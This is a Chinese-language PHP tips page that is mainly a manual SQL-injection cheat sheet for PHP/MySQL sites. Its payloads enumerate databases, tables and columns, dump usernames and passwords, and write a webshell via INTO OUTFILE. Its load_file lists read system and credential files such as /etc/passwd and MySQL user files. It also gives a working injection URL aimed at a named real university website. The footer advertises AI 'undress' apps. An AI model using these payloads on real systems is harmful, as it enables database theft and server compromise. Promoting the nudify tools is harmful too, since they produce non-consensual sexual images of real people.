PHP+MySQL 手工注入语句大全 推荐_php技巧
暴字段长度
Order by num/*
匹配字段
and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*
利用内置函数暴数据库信息
version() database() user()
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
暴库 (mysql>5.0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
猜表
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
猜字段
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
暴密码
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
直接写马(Root权限)
条件:1、知道站点物理路径
2、有足够大的权限(可以用select …. from mysql.user测试)
3、magic_quotes_gpc()=OFF
select ‘' into outfile ‘物理路径'
and 1=2 union all select 一句话HEX值 into outfile '路径'
load_file() 常用路径:
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “ 3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:\APACHE\Apache2\conf\httpd.conf
9、C:\Program Files\mysql\my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
17 、/etc/my.cnf MYSQL的配置文件
18、 /etc/redhat-release 红帽子的系统版本
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24、c:\windows\my.ini
25、c:\boot.ini
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
注:
Char(60)表示
Char(32)表示 空格
手工注射时出现的问题:
当注射后页面显示:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
如:http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
这是由于前后编码不一致造成的,
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
既可以继续注射了。。。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian
Dec 24, 2024 pm 04:42 PM
PHP 8.4 brings several new features, security improvements, and performance improvements with healthy amounts of feature deprecations and removals. This guide explains how to install PHP 8.4 or upgrade to PHP 8.4 on Ubuntu, Debian, or their derivati
How to fix mysql_native_password not loaded errors on MySQL 8.4
Dec 09, 2024 am 11:42 AM
One of the major changes introduced in MySQL 8.4 (the latest LTS release as of 2024) is that the "MySQL Native Password" plugin is no longer enabled by default. Further, MySQL 9.0 removes this plugin completely. This change affects PHP and other app
How To Set Up Visual Studio Code (VS Code) for PHP Development
Dec 20, 2024 am 11:31 AM
Visual Studio Code, also known as VS Code, is a free source code editor — or integrated development environment (IDE) — available for all major operating systems. With a large collection of extensions for many programming languages, VS Code can be c
How do you parse and process HTML/XML in PHP?
Feb 07, 2025 am 11:57 AM
This tutorial demonstrates how to efficiently process XML documents using PHP. XML (eXtensible Markup Language) is a versatile text-based markup language designed for both human readability and machine parsing. It's commonly used for data storage an
PHP Program to Count Vowels in a String
Feb 07, 2025 pm 12:12 PM
A string is a sequence of characters, including letters, numbers, and symbols. This tutorial will learn how to calculate the number of vowels in a given string in PHP using different methods. The vowels in English are a, e, i, o, u, and they can be uppercase or lowercase. What is a vowel? Vowels are alphabetic characters that represent a specific pronunciation. There are five vowels in English, including uppercase and lowercase: a, e, i, o, u Example 1 Input: String = "Tutorialspoint" Output: 6 explain The vowels in the string "Tutorialspoint" are u, o, i, a, o, i. There are 6 yuan in total
7 PHP Functions I Regret I Didn't Know Before
Nov 13, 2024 am 09:42 AM
If you are an experienced PHP developer, you might have the feeling that you’ve been there and done that already.You have developed a significant number of applications, debugged millions of lines of code, and tweaked a bunch of scripts to achieve op
The page is blank after PHP is connected to MySQL. What is the reason for the invalid die() function?
Apr 01, 2025 pm 03:03 PM
The page is blank after PHP connects to MySQL, and the reason why die() function fails. When learning the connection between PHP and MySQL database, you often encounter some confusing things...
Top 10 PHP CMS Platforms For Developers in 2024
Dec 05, 2024 am 10:29 AM
CMS stands for Content Management System. It is a software application or platform that enables users to create, manage, and modify digital content without requiring advanced technical knowledge. CMS allows users to easily create and organize content
